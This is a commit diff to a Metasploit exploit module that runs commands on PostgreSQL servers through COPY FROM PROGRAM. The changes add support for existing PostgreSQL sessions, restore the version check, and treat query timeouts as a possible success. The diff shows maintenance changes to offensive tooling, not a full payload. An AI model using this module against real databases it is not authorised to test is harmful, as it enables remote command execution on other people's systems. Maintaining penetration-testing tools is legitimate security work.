Use PostgreSQL session type for postgres_copy_from_program_cmd_exec

sjanusz-r7 · Jan 24, 2024 · 0cf4d6a · 0cf4d6a
1 parent a7c9f1f
commit 0cf4d6a
Showing 1 changed file with 10 additions and 10 deletions.
diff --git a/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb b/modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Postgres
   include Msf::Exploit::Remote::Tcp
   include Msf::Auxiliary::Report
+  include Msf::OptionalSession
 
   def initialize(info = {})
     super(update_info(info,
@@ -72,11 +73,11 @@ def initialize(info = {})
             }
           ],
         ],
-      'DisclosureDate' => '2019-03-20'
+      'DisclosureDate' => '2019-03-20',
+      'SessionTypes' => %w[PostgreSQL]
     ))
 
     register_options([
-      Opt::RPORT(5432),
       OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
       OptBool.new('DUMP_TABLE_OUTPUT', [false, 'select payload command output from table (For Debugging)', false])
       ])
@@ -98,12 +99,8 @@ def vuln_version?
     version = postgres_fingerprint
     return false unless version[:auth]
     vprint_status version[:auth].to_s
-    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
-    if Rex::Version.new(version_full) >= Rex::Version.new('9.3')
-      return true
-    else
-      return false
-    end
+    version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/i).flatten.first
+    Rex::Version.new(version_full) >= Rex::Version.new('9.3')
   end
 
   def login_success?
@@ -165,6 +162,10 @@ def execute_payload
       print_error "#{peer} - Connection error"
       return false
     when :sql_error
+      if copy_query[:sql_error].match? 'execution expired'
+        print_warning 'Timed out. The function was potentially executed.'
+        return true
+      end
       print_warning "#{peer} - Unable to execute query: #{query}"
       if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
         print_error 'Insufficient permissions, User must be superuser or in pg_read_server_files group'
@@ -235,8 +236,7 @@ def do_login(user, pass, database)
   end
 
   def exploit
-    #vuln_version doesn't seem to work
-    #return unless vuln_version?
+    return unless vuln_version?
     return unless login_success?
     print_status("Exploiting...")
     if execute_payload